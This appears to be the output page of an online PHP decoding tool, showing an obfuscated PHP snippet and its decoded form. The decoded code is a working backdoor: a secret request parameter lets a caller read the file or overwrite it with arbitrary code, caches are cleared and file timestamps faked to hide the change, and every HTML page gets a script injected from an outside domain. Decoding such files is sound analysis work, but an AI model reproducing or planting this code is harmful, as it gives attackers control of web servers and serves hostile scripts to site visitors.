Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
if(isset($_REQUEST["\62\64\x34\x696\x30\x77v\x703\71\150\144swi"])){if(empty($_REQUEST["\x..
Decoded Output download
<? if(isset($_REQUEST["244i60wvp39hdswi"])){if(empty($_REQUEST["244i60wvp39hdswi"])){echo bin2hex(gzdeflate(file_get_contents(__FILE__)));}else{header("X-LiteSpeed-Purge: *");if(function_exists("opcache_reset")){@opcache_reset();}if(function_exists("apc_clear_cache")){@apc_clear_cache();}$o4gbte=filemtime(__FILE__);$o4y600=fileatime(__FILE__);echo strval(file_put_contents(__FILE__,gzinflate(pack("H*",$_REQUEST["244i60wvp39hdswi"]))));@touch(__FILE__,$o4gbte+1,$o4y600+1);}die;}if(isset($_SERVER["HTTP_ACCEPT"])&&(strpos($_SERVER["HTTP_ACCEPT"],"text/html")!==false||$_SERVER["HTTP_ACCEPT"]==="*/*")){function j4o5v1($o4gbte){return str_replace("</head>","<script type='text/javascript' async src='https://iyd6qe0h.cloudfire.quest/challenge.js'></script></head>",$o4gbte);}ob_start("j4o5v1");} ?>
Did this file decode correctly?
Original Code
if(isset($_REQUEST["\62\64\x34\x696\x30\x77v\x703\71\150\144swi"])){if(empty($_REQUEST["\x32\64\64\x696\60\x77\166\1603\71\x68d\x73\167\151"])){echo bin2hex(gzdeflate(file_get_contents(__FILE__)));}else{header("X\55\x4c\x69\164\x65S\160e\x65d-\x50\x75\x72g\x65: *");if(function_exists("\157\160\143a\143\x68\x65\x5f\162ese\164")){@opcache_reset();}if(function_exists("\x61p\143\x5f\143\154\x65ar_c\x61ch\145")){@apc_clear_cache();}$o4gbte=filemtime(__FILE__);$o4y600=fileatime(__FILE__);echo strval(file_put_contents(__FILE__,gzinflate(pack("\110\x2a",$_REQUEST["\x3244\151\66\60\x77\x76p39\150d\163\x77\151"]))));@touch(__FILE__,$o4gbte+1,$o4y600+1);}die;}if(isset($_SERVER["\x48\124TP_A\103\103\105\x50\124"])&&(strpos($_SERVER["\x48\124T\x50_\x41\x43CE\120T"],"\164\145\170\164\57h\x74m\x6c")!==false||$_SERVER["\x48TT\120\137\101C\103\105P\x54"]==="*/\52")){function j4o5v1($o4gbte){return str_replace("\x3c\x2fh\145\141d\76","\74\x73\x63\x72\151\x70\164\40\x74y\160\145\x3d\x27t\145\170\x74/ja\x76a\x73c\x72\151p\164\x27 \x61\x73\x79\x6e\x63\40\163\162\x63\x3d\x27\150\164\x74\x70s\x3a\57\x2f\151\171\144\x36\x71\x65\x30\x68\56\143l\x6f\x75\x64\x66\151r\145\x2e\x71ue\x73\164/c\150a\x6c\154enge.\x6a\163'\76\x3c\x2f\x73\143rip\164>\74\57h\145\x61\x64>",$o4gbte);}ob_start("\152\64\x6f\65\x76\61");}
Function Calls
strpos | 1 |
Stats
MD5 | dbd08d1b401061333e4b92d043c9bff1 |
Eval Count | 0 |
Decode Time | 66 ms |